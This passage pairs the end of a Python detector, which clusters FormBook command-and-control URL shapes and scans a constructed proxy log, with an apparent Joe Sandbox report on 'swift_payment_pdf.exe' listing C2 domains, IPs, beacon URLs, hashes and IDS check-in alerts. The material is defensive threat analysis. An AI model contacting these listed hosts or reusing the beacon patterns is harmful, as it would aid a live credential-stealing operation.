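    "http://www.tofcomy.xyz/gw8h/?LtQxGF=zGt49IFm93SrBWz0hF/Exo3fFaLGg1tTuVJPwAsKzCbkUXUSx9Ko4qRJeqPE/lbiWQNCjazmLjusy2a3r/X1USIwM3t9fhEbscmQM7mJ8GSckJYgF9Mlv0Q=&tDVH=AxaL",
    "http://www.alanbeanart.com/jdip/",
    "https://duckduckgo.com/ac/?q=",
    "https://ac.ecosia.org/autocomplete?q=",
    "https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=",
]

# CONSTRUCTED proxy log: "<timestamp> <client> <method> <url> <status>".
PROXY_LOG = """\
2024-07-04T10:01:12Z 10.0.0.5 GET http://www.example-shop.test/k2x9/?LtQxGF=AAAA&tDVH=AxaL 200
2024-07-04T10:01:15Z 10.0.0.5 GET https://duckduckgo.com/ac/?q=weather 200
2024-07-04T10:02:40Z 10.0.0.7 POST http://www.wwfglobal.com/awho/ 200
"""


def url_shape(url):
    """(lengths of path segments, sorted query keys): independent of host and values."""
    p = urlsplit(url)
    seg_lengths = tuple(len(s) for s in p.path.split("/") if s)
    keys = tuple(sorted(k for k, _ in parse_qsl(p.query, keep_blank_values=True)))
    return (seg_lengths, keys)


def cluster_by_shape(urls, min_hosts=3):
    """Map shape -> set of hostnames, keeping shapes seen on >= min_hosts distinct hosts."""
    groups = defaultdict(set)
    for u in urls:
        groups[url_shape(u)].add(urlsplit(u).hostname)
    return {s: h for s, h in groups.items() if len(h) >= min_hosts}


def learn_signatures(urls, min_hosts=3):
    """Shapes that carry query keys become URL signatures; every host in any cluster
    becomes a known-bad host.  A bare four-character path without a query is too
    generic to match on by itself, so it only contributes hosts."""
    clusters = cluster_by_shape(urls, min_hosts)
    signatures = {s for s in clusters if s[1]}
    hosts = set().union(*clusters.values()) if clusters else set()
    return signatures, hosts


def scan_log(log_text, signatures, known_hosts):
    """Return (timestamp, client, host, reason) for each proxy line that matches."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        ts, client, _method, url = fields[:4]
        host = urlsplit(url).hostname
        if url_shape(url) in signatures:
            hits.append((ts, client, host, "c2-url-shape"))
        elif host in known_hosts:
            hits.append((ts, client, host, "known-c2-host"))
    return hits


if __name__ == "__main__":
    sigs, hosts = learn_signatures(SAMPLE_URLS)
    print("signatures:", sigs)
    for hit in scan_log(PROXY_LOG, sigs, hosts):
        print(*hit)
```

The shape match fires on a host that appears nowhere in the report (the constructed example-shop.test line) because the generator, not the domain, is what the signature encodes; the host-list match catches the bare POST to a known path. Matching on query keys only, and never on the opaque values, keeps the rule stable across beacons whose encrypted payload changes every time.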
Name | Source | Malicious (antivirus detection and reputation follow each entry)
https://duckduckgo.com/chrome_newtab | explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmp | false
• 0%, Virustotal
• Avira URL Cloud: safe
Reputation: unknown
http://www.fontbureau.com/designersG | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
http://www.wwfglobal.com | AbWHWpocGREf.exe, 00000008.00000002.3556641408.0000000004B56000.00000040.80000000.00040000.00000000.sdmp | false
• 0%, Virustotal
• Avira URL Cloud: safe
Reputation: unknown
https://duckduckgo.com/ac/?q= | explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmp | false
• 0%, Virustotal
• Avira URL Cloud: safe
Reputation: unknown
http://www.fontbureau.com/designers/? | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
http://www.founder.com.cn/cn/bThe | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
http://www.fontbureau.com/designers? | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
http://www.tiro.com | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
http://www.fontbureau.com/designers | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
http://www.goodfont.co.kr | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
http://www.sajatypeworks.com | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
http://www.typography.netD | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
http://www.founder.com.cn/cn/cThe | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
http://www.galapagosdesign.com/staff/dennis.htm | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
http://www.galapagosdesign.com/DPlease | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
http://www.fonts.com | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
http://www.sandoll.co.kr | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
http://www.urwpp.deDPlease | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
http://www.zhongyicts.com.cn | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
http://www.sakkal.com | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
http://www.apache.org/licenses/LICENSE-2.0 | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
http://www.fontbureau.com | swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false
• URL Reputation: safe
Reputation: unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmp | false
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://soft.365jz.com/explorer.exe, 00000007.00000002.3556356066.0000000005E6A000.00000004.10000000.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000008.00000002.3555103381.0000000002F4A000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://www.enrich-pet.com/qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vRexplorer.exe, 00000007.00000002.3556356066.00000000059B4000.00000004.10000000.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000008.00000002.3555103381.0000000002A94000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2537070177.000000000CC84000.00000004.80000000.00040000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                https://www.ecosia.org/newtab/explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.carterandcone.comlswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://ac.ecosia.org/autocomplete?q=explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.fontbureau.com/designers/cabarga.htmlNswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.sakkal.com0swift_payment_pdf.exe, 00000000.00000002.1915539193.00000000058A0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.founder.com.cn/cnswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.fontbureau.com/designers/frere-user.htmlswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.jiyu-kobo.co.jp/swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.fontbureau.com/designers8swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IP | Domain | Country | ASN | ASN Name | Malicious
                194.195.220.41 | www.cheapdesklamp.shop | Germany | 6659 | NEXINTO-DE | true
                52.1.217.30 | enagicwebsystem.com | United States | 14618 | AMAZON-AESUS | true
                34.149.87.45 | td-ccm-neg-87-45.wixdns.net | United States | 2686 | ATGS-MMD-ASUS | true
                162.0.236.122 | www.tofcomy.xyz | Canada | 22612 | NAMECHEAP-NETUS | true
                3.33.130.190 | alanbeanart.com | United States | 8987 | AMAZONEXPANSIONGB | true
                116.213.43.190 | www.qaronvc.lol | Hong Kong | 63889 | CLOUDIVLIMITED-ASCloudIvLimitedHK | true
                172.80.82.186 | www.piqia.top | United States | 22552 | ESITEDUS | true
                Joe Sandbox version: 40.0.0 Tourmaline
                Analysis ID: 1467534
                Start date and time: 2024-07-04 12:33:53 +02:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 10m 3s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Run name: Run with higher sleep bypass
                Number of new started processes analysed: 9
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 2
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: swift_payment_pdf.exe
                Detection: MAL
                Classification: mal100.troj.spyw.evad.winEXE@7/2@10/7
                EGA Information:
                • Successful, ratio: 75%
                HCA Information:
                • Successful, ratio: 96%
                • Number of executed functions: 112
                • Number of non-executed functions: 301
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target AbWHWpocGREf.exe, PID 5596 because it is empty
                • Not all processes were analyzed; the report is missing behavior information
                • Report creation exceeded the maximum time and may be missing disassembly code information
                Time | Type | Description
                06:36:17 | API Interceptor | 5034123x Sleep call for process: explorer.exe modified
                Process: C:\Users\user\Desktop\swift_payment_pdf.exe
                File Type: ASCII text, with CRLF line terminators
                Category: dropped
                Size (bytes): 1216
                Entropy (8bit): 5.34331486778365
                Encrypted: false
                SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                MD5: 1330C80CAAC9A0FB172F202485E9B1E8
                SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                Malicious: true
                Reputation: high, very likely benign file
                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                Process: C:\Windows\SysWOW64\explorer.exe
                File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                Category: dropped
                Size (bytes): 114688
                Entropy (8bit): 0.9746603542602881
                Encrypted: false
                SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                MD5: 780853CDDEAEE8DE70F28A4B255A600B
                SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
                SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                Malicious: false
                Reputation: high, very likely benign file
                Preview: SQLite format 3......@ .......8...........$......................................................O}...........4........ (remainder of the preview is unprintable padding)
                File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit): 7.943294827580094
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                • Win32 Executable (generic) a (10002005/4) 49.75%
                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                • Windows Screen Saver (13104/52) 0.07%
                • Generic Win/DOS Executable (2004/3) 0.01%
                File name: swift_payment_pdf.exe
                File size: 730'624 bytes
                MD5: 8e32f87b4f51fac392122d3c43b2e54f
                SHA1: ac11a7300dbec0d2b67e549b97d3a1ab4e30c94a
                SHA256: e7c888a111eeb26eec94afc97e0f9b838fda41ab74e083cb5b94f06800890d2d
                SHA512: e44f6575dc27347ffdd64465539ce58159ddbf0778d548973edb22ab18fb5aa735eb2328a6f1f144c59142d06036679da5979e2356105b23f42e260a3e80c655
                SSDEEP: 12288:05m/rFrlNf+wr8l1KwycLpArl/8zmT+khGodl+wP9934t/SLEhLpZNdfT:RFBuEwyc1AhEzpmGMl+wP9p4JlNp
                TLSH: 86F4230076B88B34D4BE9BB655B146248FB1A63EAD12DBDD1CC940DE8CB3749C501F6B
                File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..............9... ...@....@.. ....................................@................................
                Icon Hash: 90cececece8e8eb0
                Entrypoint: 0x4b39d2
                Entrypoint Section: .text
                Digitally signed: false
                Imagebase: 0x400000
                Subsystem: windows gui
                Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp: 0x6685DA16 [Wed Jul 3 23:09:10 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major: 4
                OS Version Minor: 0
                File Version Major: 4
                File Version Minor: 0
                Subsystem Version Major: 4
                Subsystem Version Minor: 0
                Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
                Instruction
                jmp dword ptr [00402000h]
                add byte ptr [eax], al
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb397f | 0x4f | .text
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb4000 | 0x624 | .rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb6000 | 0xc | .reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0920 | 0x54 | .text
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                .text | 0x2000 | 0xb19d8 | 0xb1a00 | 0c67bbd4cc704538ee850151c0e3b94a | False | 0.9527222796446164 | data | 7.951002807224344 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rsrc | 0xb4000 | 0x624 | 0x800 | 16ea09e970020878a166ba9f624b4212 | False | 0.3427734375 | data | 3.478355386329158 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc | 0xb6000 | 0xc | 0x200 | e6f15573941ac56212bba43083069c90 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                RT_VERSION | 0xb4090 | 0x394 | OpenPGP Secret Key | | | 0.435589519650655
                RT_MANIFEST | 0xb4434 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                DLL | Import
                mscoree.dll | _CorExeMain
                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                07/04/24-12:36:18.264786 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 60623 | 80 | 192.168.2.4 | 3.33.130.190
                07/04/24-12:36:10.661734 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 60620 | 80 | 192.168.2.4 | 3.33.130.190
                07/04/24-12:35:55.019985 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 60619 | 80 | 192.168.2.4 | 34.149.87.45
                07/04/24-12:37:07.168398 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 60631 | 80 | 192.168.2.4 | 172.80.82.186
                07/04/24-12:36:31.720572 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 60627 | 80 | 192.168.2.4 | 116.213.43.190
                07/04/24-12:37:13.031456 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 60632 | 80 | 192.168.2.4 | 194.195.220.41
                07/04/24-12:37:25.721255 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 60636 | 80 | 192.168.2.4 | 162.0.236.122
                07/04/24-12:37:54.731409 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 60643 | 80 | 192.168.2.4 | 52.1.217.30
                07/04/24-12:37:28.307762 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 60637 | 80 | 192.168.2.4 | 162.0.236.122
                07/04/24-12:36:13.202756 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 60621 | 80 | 192.168.2.4 | 3.33.130.190
                07/04/24-12:36:26.653593 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 60625 | 80 | 192.168.2.4 | 116.213.43.190
                07/04/24-12:37:46.701989 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 60640 | 80 | 192.168.2.4 | 52.1.217.30
                07/04/24-12:36:24.114076 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 60624 | 80 | 192.168.2.4 | 116.213.43.190
                07/04/24-12:37:49.265901 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 60641 | 80 | 192.168.2.4 | 52.1.217.30
                07/04/24-12:37:20.644937 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 60635 | 80 | 192.168.2.4 | 194.195.220.41
                07/04/24-12:37:01.781228 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 60629 | 80 | 192.168.2.4 | 172.80.82.186
                07/04/24-12:38:00.723849 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 60644 | 80 | 192.168.2.4 | 23.226.70.194
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 4, 2024 12:35:55.004437923 CEST | 60619 | 80 | 192.168.2.4 | 34.149.87.45
Jul 4, 2024 12:35:55.009546995 CEST | 80 | 60619 | 34.149.87.45 | 192.168.2.4
Jul 4, 2024 12:35:55.009644985 CEST | 60619 | 80 | 192.168.2.4 | 34.149.87.45
Jul 4, 2024 12:35:55.019984961 CEST | 60619 | 80 | 192.168.2.4 | 34.149.87.45
Jul 4, 2024 12:35:55.025290012 CEST | 80 | 60619 | 34.149.87.45 | 192.168.2.4
Jul 4, 2024 12:35:55.523375034 CEST | 80 | 60619 | 34.149.87.45 | 192.168.2.4
Jul 4, 2024 12:35:55.523479939 CEST | 80 | 60619 | 34.149.87.45 | 192.168.2.4
Jul 4, 2024 12:35:55.523603916 CEST | 60619 | 80 | 192.168.2.4 | 34.149.87.45
Jul 4, 2024 12:35:55.526612997 CEST | 60619 | 80 | 192.168.2.4 | 34.149.87.45
Jul 4, 2024 12:35:55.532908916 CEST | 80 | 60619 | 34.149.87.45 | 192.168.2.4
Jul 4, 2024 12:36:10.645859957 CEST | 60620 | 80 | 192.168.2.4 | 3.33.130.190
Jul 4, 2024 12:36:10.650690079 CEST | 80 | 60620 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:10.652406931 CEST | 60620 | 80 | 192.168.2.4 | 3.33.130.190
Jul 4, 2024 12:36:10.661734104 CEST | 60620 | 80 | 192.168.2.4 | 3.33.130.190
Jul 4, 2024 12:36:10.666780949 CEST | 80 | 60620 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:11.128046989 CEST | 80 | 60620 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:11.128205061 CEST | 60620 | 80 | 192.168.2.4 | 3.33.130.190
Jul 4, 2024 12:36:12.174675941 CEST | 60620 | 80 | 192.168.2.4 | 3.33.130.190
Jul 4, 2024 12:36:12.182172060 CEST | 80 | 60620 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:13.194328070 CEST | 60621 | 80 | 192.168.2.4 | 3.33.130.190
Jul 4, 2024 12:36:13.199384928 CEST | 80 | 60621 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:13.199457884 CEST | 60621 | 80 | 192.168.2.4 | 3.33.130.190
Jul 4, 2024 12:36:13.202755928 CEST | 60621 | 80 | 192.168.2.4 | 3.33.130.190
Jul 4, 2024 12:36:13.209856987 CEST | 80 | 60621 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:13.223304033 CEST | 80 | 60621 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:15.724684000 CEST | 60622 | 80 | 192.168.2.4 | 3.33.130.190
Jul 4, 2024 12:36:15.730070114 CEST | 80 | 60622 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:15.730170012 CEST | 60622 | 80 | 192.168.2.4 | 3.33.130.190
Jul 4, 2024 12:36:15.732542992 CEST | 60622 | 80 | 192.168.2.4 | 3.33.130.190
Jul 4, 2024 12:36:15.737426996 CEST | 80 | 60622 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:15.737437963 CEST | 80 | 60622 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:15.737447023 CEST | 80 | 60622 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:15.737514973 CEST | 80 | 60622 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:15.737716913 CEST | 80 | 60622 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:15.737726927 CEST | 80 | 60622 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:15.737824917 CEST | 80 | 60622 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:15.737834930 CEST | 80 | 60622 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:15.737843037 CEST | 80 | 60622 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:16.210438967 CEST | 80 | 60622 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:16.210681915 CEST | 60622 | 80 | 192.168.2.4 | 3.33.130.190
Jul 4, 2024 12:36:17.240235090 CEST | 60622 | 80 | 192.168.2.4 | 3.33.130.190
Jul 4, 2024 12:36:17.435058117 CEST | 80 | 60622 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:18.255857944 CEST | 60623 | 80 | 192.168.2.4 | 3.33.130.190
Jul 4, 2024 12:36:18.262588024 CEST | 80 | 60623 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:18.262783051 CEST | 60623 | 80 | 192.168.2.4 | 3.33.130.190
Jul 4, 2024 12:36:18.264786005 CEST | 60623 | 80 | 192.168.2.4 | 3.33.130.190
Jul 4, 2024 12:36:18.271512032 CEST | 80 | 60623 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:18.735172033 CEST | 80 | 60623 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:18.735260010 CEST | 80 | 60623 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:18.735368013 CEST | 60623 | 80 | 192.168.2.4 | 3.33.130.190
Jul 4, 2024 12:36:18.737929106 CEST | 60623 | 80 | 192.168.2.4 | 3.33.130.190
Jul 4, 2024 12:36:18.742847919 CEST | 80 | 60623 | 3.33.130.190 | 192.168.2.4
Jul 4, 2024 12:36:24.106890917 CEST | 60624 | 80 | 192.168.2.4 | 116.213.43.190
Jul 4, 2024 12:36:24.111884117 CEST | 80 | 60624 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:24.112005949 CEST | 60624 | 80 | 192.168.2.4 | 116.213.43.190
Jul 4, 2024 12:36:24.114075899 CEST | 60624 | 80 | 192.168.2.4 | 116.213.43.190
Jul 4, 2024 12:36:24.118932009 CEST | 80 | 60624 | 116.213.43.190 | 192.168.2.4
Jul 4, 2024 12:36:25.627938032 CEST | 60624 | 80 | 192.168.2.4 | 116.213.43.190
Jul 4, 2024 12:36:25.676723003 CEST | 80 | 60624 | 116.213.43.190 | 192.168.2.4
